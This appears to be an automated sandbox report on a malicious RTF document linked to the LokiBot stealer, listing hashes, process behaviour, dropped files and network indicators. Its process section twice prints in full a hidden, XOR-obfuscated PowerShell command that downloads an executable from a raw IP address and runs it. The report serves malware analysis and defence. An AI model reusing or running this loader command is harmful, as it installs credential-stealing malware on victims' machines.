analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

4c90d2e1ecea9d791bd291925961be16.rtf

Full analysis: https://app.any.run/tasks/25be6855-c595-4c75-8196-8adbbfd461d5
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: February 19, 2019, 07:04:56
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
generated-doc
opendir
loader
trojan
lokibot
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

4C90D2E1ECEA9D791BD291925961BE16

SHA1:

60A1CC2169F97DD2392A16E5F3824C7B8C293C63

SHA256:

47225BD8D1AA622FBC7E75597C1AC7F4AA95A078ED1C70F2B947D76DAEB0721F

SSDEEP:

1536:oZd1qnIPp04zv53rQNEPOaoiaL/qnIPp04zv53rQNEPOaoiaL/qnIPp04zv53rQt:oHt5u5u5u5u5UV7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3844)
      • EXCEL.EXE (PID: 3880)
      • EXCEL.EXE (PID: 2260)
      • EXCEL.EXE (PID: 3792)
      • EXCEL.EXE (PID: 3480)
    • Executes PowerShell scripts

      • EXCEL.EXE (PID: 3844)
      • EXCEL.EXE (PID: 3880)
      • EXCEL.EXE (PID: 2260)
      • EXCEL.EXE (PID: 3792)
      • EXCEL.EXE (PID: 3480)
    • Application was dropped or rewritten from another process

      • v89b37.exe (PID: 2688)
      • v89b37.exe (PID: 3732)
      • v89b37.exe (PID: 2772)
      • v89b37.exe (PID: 3932)
      • v89b37.exe (PID: 3952)
      • v89b37.exe (PID: 1348)
      • v89b37.exe (PID: 1656)
      • v89b37.exe (PID: 2436)
      • v89b37.exe (PID: 2316)
    • Downloads executable files from IP

      • powershell.exe (PID: 3148)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3148)
    • Detected artifacts of LokiBot

      • v89b37.exe (PID: 1348)
    • Actions looks like stealing of personal data

      • v89b37.exe (PID: 1348)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3148)
      • powershell.exe (PID: 2420)
      • powershell.exe (PID: 3444)
      • powershell.exe (PID: 2736)
      • powershell.exe (PID: 2644)
      • v89b37.exe (PID: 1348)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3148)
      • csc.exe (PID: 3528)
      • csc.exe (PID: 3980)
      • v89b37.exe (PID: 1348)
    • Application launched itself

      • v89b37.exe (PID: 2688)
      • v89b37.exe (PID: 3732)
      • v89b37.exe (PID: 3932)
      • v89b37.exe (PID: 2772)
    • Loads DLL from Mozilla Firefox

      • v89b37.exe (PID: 1348)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2972)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3844)
      • WINWORD.EXE (PID: 2972)
      • EXCEL.EXE (PID: 3880)
      • EXCEL.EXE (PID: 2260)
      • EXCEL.EXE (PID: 3792)
      • excelcnv.exe (PID: 2112)
      • EXCEL.EXE (PID: 3480)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

Author: Admin
LastModifiedBy: Admin
CreateDate: 2019:01:07 23:54:00
ModifyDate: 2019:01:07 23:54:00
RevisionNumber: 1
TotalEditTime: -
Pages: 1
Words: -
Characters: 4
CharactersWithSpaces: 4
InternalVersionNumber: 57435
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
66
Monitored processes
31
Malicious processes
8
Suspicious processes
4

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs excel.exe no specs powershell.exe csc.exe cvtres.exe no specs v89b37.exe no specs excel.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs v89b37.exe no specs excel.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs v89b37.exe no specs excel.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs v89b37.exe no specs excel.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs #LOKIBOT v89b37.exe v89b37.exe no specs excelcnv.exe no specs v89b37.exe no specs v89b37.exe no specs v89b37.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2972"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\4c90d2e1ecea9d791bd291925961be16.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3844"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3148"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -noprofile function e7afb9 { param($x29828) $y6fa8 = 'z6b6d7'; $r8be8 = ''; for ($i = 0; $i -lt $x29828.length; $i+=2) { $q8fcfc = [convert]::ToByte($x29828.Substring($i, 2), 16); $r8be8 += [char]($q8fcfc -bxor $y6fa8[($i / 2) % $y6fa8.length]); } return $r8be8; } $c8c59 = '0f450b580317294f1142015a413b6843175e145142651d440e530f18364214420b5b01193358165316580a650744125e1953110d693d0a43005a0d545a550e5717445a4455550254483b684d693d5a16421644175a163972085b335b125916435214095316591f5a5104461e273b681644175a16421644470f540e5f0717094203420d545a531a42014514162b5810670e44427101432a440d5525531e440745171f3358166610455a5e2f59004216534e161743085f0c51444708590178055a1f1f593b6e175a16421644175a6d265a087e17460d44101f585d07440a52160550144d6a773c421644175a1642161442185a0b5544440e57165f07171f4e165316595a7f0c42344308162e590553365f00440545031e1142165e14514258055a1f1f593b6e175a16421644175a6d265a087e17460d44101f585d07440a52160550144d6a773c421644175a1642161442185a0b5544440e57165f07171f4e165316595a540d5908172c5f1042115616661059105219424a7f0a432a42101608473b5206440144091a42632d590e66164444530d650b4c011b5a430b5810171c5a2c53136708591653074356160d4310170f5f0c42445b0a500e7908532a440d4201540e1f593b6e175a16421644175a6d265a087e17460d44101f587d07440a5216055018005b16144e1621590e441b660b5e1442420b441528420e7b0b411f7b075b0b4503144e1637520e7a0345107208440d44440a5a50035a1752536b6f3c44175a1642164417094203420d545a531a420145141614590d535a7b0d40017a1f5b0d441d1f3358166610455a520745101b5a7f0c42344308161144071b5a5f0c424444134c071f5f3a703b681644175a16421644470f540e5f0717094203420d545a5f0c4244521f0153535654521f6f3c44175a1642164417013b681644175a16421644175a16427f0a432a421016095319020316591736590352285e184403441d1f1f010350060e5214535451554b07575050564f0553005156581f4b0d693d5a16421644175a16421644171350421e095319020316590a5a7f0c423443081838531658533b681644175a16421644175a16424d693d5a16421644175a16421644175a16421616520e4310584406413b681644175a16421644175a16424b693d773c421644175a16421644175a162b5810670e44425801554853070f440a5a71074234451555235200451f45111e09531902031a44524d5704545d1f5805000306064b03040553024e0700035c054a02510656024b0704025015531f593b6e175a16421644175a164216445e1c164a5801554853070f440a47162b5810670e444c6c0145151f6f3c44175a16421644175a1642161f3a7016421644175a16421644175a16421644451f4217440a174b0d6f3c44175a16421644175a164216193a703b681644175a16421644175a1642632d590e66164444530d650b4c011747164a632d590e6616444d02413b681644175a16421644175a1642430d590e16385316585a0b42065f3a7016421644175a16421644175a5f04164c162c5f1042115616661059105219424a5801554853070f48171e41315f1e525616524e500756160d431017205310594d1e773c421644175a16421644175a16193b6e175a16421644175a16421644175a16424401430f440c16550c773c421644175a16421644175a161f3b6e175a16421644175a16421644750342076d39172a5716550c1747161916544f49074e16544f1c504e16544f4306424b5f3a7016421644175a16421644175a7f0c423443081617580956145705530067155f0c4201455a0b427b0545095e035a4a76165a0d552c7016590057081f491f593b6e175a16421644175a164216447a1b44115e055b54750d461d1f2a5716550c1b5a064e16115917570c5703521e660d5f0a431f444e16571e413b681644175a16421644175a16427b0b411f7b075b0b45031e0c5313173358166610455258075456521f0f4c620b7e144254024c1e5a1d42061c074a07001f48170f580f570a561d5306660b5e144207444817491f593b6e175a16421644175a16421644451f4217440a174a0d6f3c44175a1642164417073b683f6d470f540e5f0717094203420d545a4516440d591d1607010551180f4a451045135805161743087f0c1f693d5a16421644175a16193b6e3e733f1142165e1451425a0553420504165917584c545452534d14593b6e175a16421644175a16421644440e440b5803171201010f53525a0b4265104513580518215a0a421b0d693d5a16421644175a16421644171c5910164c5e1442425f440a5a0659160d1746161142167e14182e530a500e5e59160d17510b42044d3a7016421644175a16421644175a4d6f3c44175a16421644175a16421644175a16004f10525a545452560f1c165f1627581440074410192e59204f1052524516442d59546517541743085f0c514c5e5616501f48174b004b0d693d5a16421644175a16421644175a1642160c00190f5553441c47164a550c56081f4a545253480e04163a171657060e5751211e0b164b17481f4213445b1b525a05021936530c51105f271f593b6e175a16421644175a164216444a773c6f3c44175a16421644175a16421616520e431058445f4d555b01010c773c421644175a164216193a704b'; $c8c592 = e7afb9($c8c59); Add-Type -TypeDefinition $c8c592; [r7cfc2]::ee71e2c(); Start-Sleep -s 1; $wcdd331 = $env:APPDATA; $hd4f46b = $wcdd331 + '\\v89b37.exe'; If (test-path $hd4f46b) {Remove-Item $hd4f46b}; $u74af = New-Object System.Net.WebClient; $u74af.Headers['User-Agent'] = 'u74af'; $u74af.DownloadFile('http://139.99.186.18:80/xml/amin.exe', $hd4f46b); Start-Process -Filepath $hd4f46b; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1324"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\-2e-nhrg.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
3140C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESAE39.tmp" "c:\Users\admin\AppData\Local\Temp\CSCAE38.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
2688"C:\Users\admin\AppData\Roaming\v89b37.exe" C:\Users\admin\AppData\Roaming\v89b37.exepowershell.exe
User:
admin
Company:
Daffy
Integrity Level:
MEDIUM
Description:
orthopraxis2
Exit code:
0
Version:
6.09.0006
3880"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2420"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -noprofile function e7afb9 { param($x29828) $y6fa8 = 'z6b6d7'; $r8be8 = ''; for ($i = 0; $i -lt $x29828.length; $i+=2) { $q8fcfc = [convert]::ToByte($x29828.Substring($i, 2), 16); $r8be8 += [char]($q8fcfc -bxor $y6fa8[($i / 2) % $y6fa8.length]); } return $r8be8; } $c8c59 = '0f450b580317294f1142015a413b6843175e145142651d440e530f18364214420b5b01193358165316580a650744125e1953110d693d0a43005a0d545a550e5717445a4455550254483b684d693d5a16421644175a163972085b335b125916435214095316591f5a5104461e273b681644175a16421644470f540e5f0717094203420d545a531a42014514162b5810670e44427101432a440d5525531e440745171f3358166610455a5e2f59004216534e161743085f0c51444708590178055a1f1f593b6e175a16421644175a6d265a087e17460d44101f585d07440a52160550144d6a773c421644175a1642161442185a0b5544440e57165f07171f4e165316595a7f0c42344308162e590553365f00440545031e1142165e14514258055a1f1f593b6e175a16421644175a6d265a087e17460d44101f585d07440a52160550144d6a773c421644175a1642161442185a0b5544440e57165f07171f4e165316595a540d5908172c5f1042115616661059105219424a7f0a432a42101608473b5206440144091a42632d590e66164444530d650b4c011b5a430b5810171c5a2c53136708591653074356160d4310170f5f0c42445b0a500e7908532a440d4201540e1f593b6e175a16421644175a6d265a087e17460d44101f587d07440a5216055018005b16144e1621590e441b660b5e1442420b441528420e7b0b411f7b075b0b4503144e1637520e7a0345107208440d44440a5a50035a1752536b6f3c44175a1642164417094203420d545a531a420145141614590d535a7b0d40017a1f5b0d441d1f3358166610455a520745101b5a7f0c42344308161144071b5a5f0c424444134c071f5f3a703b681644175a16421644470f540e5f0717094203420d545a5f0c4244521f0153535654521f6f3c44175a1642164417013b681644175a16421644175a16427f0a432a421016095319020316591736590352285e184403441d1f1f010350060e5214535451554b07575050564f0553005156581f4b0d693d5a16421644175a16421644171350421e095319020316590a5a7f0c423443081838531658533b681644175a16421644175a16424d693d5a16421644175a16421644175a16421616520e4310584406413b681644175a16421644175a16424b693d773c421644175a16421644175a162b5810670e44425801554853070f440a5a71074234451555235200451f45111e09531902031a44524d5704545d1f5805000306064b03040553024e0700035c054a02510656024b0704025015531f593b6e175a16421644175a164216445e1c164a5801554853070f440a47162b5810670e444c6c0145151f6f3c44175a16421644175a1642161f3a7016421644175a16421644175a16421644451f4217440a174b0d6f3c44175a16421644175a164216193a703b681644175a16421644175a1642632d590e66164444530d650b4c011747164a632d590e6616444d02413b681644175a16421644175a1642430d590e16385316585a0b42065f3a7016421644175a16421644175a5f04164c162c5f1042115616661059105219424a5801554853070f48171e41315f1e525616524e500756160d431017205310594d1e773c421644175a16421644175a16193b6e175a16421644175a16421644175a16424401430f440c16550c773c421644175a16421644175a161f3b6e175a16421644175a16421644750342076d39172a5716550c1747161916544f49074e16544f1c504e16544f4306424b5f3a7016421644175a16421644175a7f0c423443081617580956145705530067155f0c4201455a0b427b0545095e035a4a76165a0d552c7016590057081f491f593b6e175a16421644175a164216447a1b44115e055b54750d461d1f2a5716550c1b5a064e16115917570c5703521e660d5f0a431f444e16571e413b681644175a16421644175a16427b0b411f7b075b0b45031e0c5313173358166610455258075456521f0f4c620b7e144254024c1e5a1d42061c074a07001f48170f580f570a561d5306660b5e144207444817491f593b6e175a16421644175a16421644451f4217440a174a0d6f3c44175a1642164417073b683f6d470f540e5f0717094203420d545a4516440d591d1607010551180f4a451045135805161743087f0c1f693d5a16421644175a16193b6e3e733f1142165e1451425a0553420504165917584c545452534d14593b6e175a16421644175a16421644440e440b5803171201010f53525a0b4265104513580518215a0a421b0d693d5a16421644175a16421644171c5910164c5e1442425f440a5a0659160d1746161142167e14182e530a500e5e59160d17510b42044d3a7016421644175a16421644175a4d6f3c44175a16421644175a16421644175a16004f10525a545452560f1c165f1627581440074410192e59204f1052524516442d59546517541743085f0c514c5e5616501f48174b004b0d693d5a16421644175a16421644175a1642160c00190f5553441c47164a550c56081f4a545253480e04163a171657060e5751211e0b164b17481f4213445b1b525a05021936530c51105f271f593b6e175a16421644175a164216444a773c6f3c44175a16421644175a16421616520e431058445f4d555b01010c773c421644175a164216193a704b'; $c8c592 = e7afb9($c8c59); Add-Type -TypeDefinition $c8c592; [r7cfc2]::ee71e2c(); Start-Sleep -s 1; $wcdd331 = $env:APPDATA; $hd4f46b = $wcdd331 + '\\v89b37.exe'; If (test-path $hd4f46b) {Remove-Item $hd4f46b}; $u74af = New-Object System.Net.WebClient; $u74af.Headers['User-Agent'] = 'u74af'; $u74af.DownloadFile('http://139.99.186.18:80/xml/amin.exe', $hd4f46b); Start-Process -Filepath $hd4f46b; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3548"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\wselt9az.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
2372C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESCC6F.tmp" "c:\Users\admin\AppData\Local\Temp\CSCCC6E.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
Total events
5 201
Read events
4 456
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
14
Text files
12
Unknown types
11

Dropped files

PID
Process
Filename
Type
2972WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR990A.tmp.cvr
MD5:
SHA256:
3844EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRA32B.tmp.cvr
MD5:
SHA256:
3148powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ASRVYEJD7XHY2NOJJQGQ.temp
MD5:
SHA256:
3140cvtres.exeC:\Users\admin\AppData\Local\Temp\RESAE39.tmp
MD5:
SHA256:
1324csc.exeC:\Users\admin\AppData\Local\Temp\-2e-nhrg.dll
MD5:
SHA256:
1324csc.exeC:\Users\admin\AppData\Local\Temp\-2e-nhrg.out
MD5:
SHA256:
3880EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRC23D.tmp.cvr
MD5:
SHA256:
2420powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VUC1QTTABY8RNI24WBI2.temp
MD5:
SHA256:
3548csc.exeC:\Users\admin\AppData\Local\Temp\CSCCC6E.tmp
MD5:
SHA256:
3548csc.exeC:\Users\admin\AppData\Local\Temp\wselt9az.pdb
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
8
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3148
powershell.exe
GET
200
139.99.186.18:80
http://139.99.186.18/xml/amin.exe
AU
executable
1.04 Mb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3148
powershell.exe
139.99.186.18:80
OVH SAS
AU
malicious

DNS requests

Domain
IP
Reputation
hongshnag.com
unknown

Threats

PID
Process
Class
Message
3148
powershell.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3148
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3148
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cppĒ
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144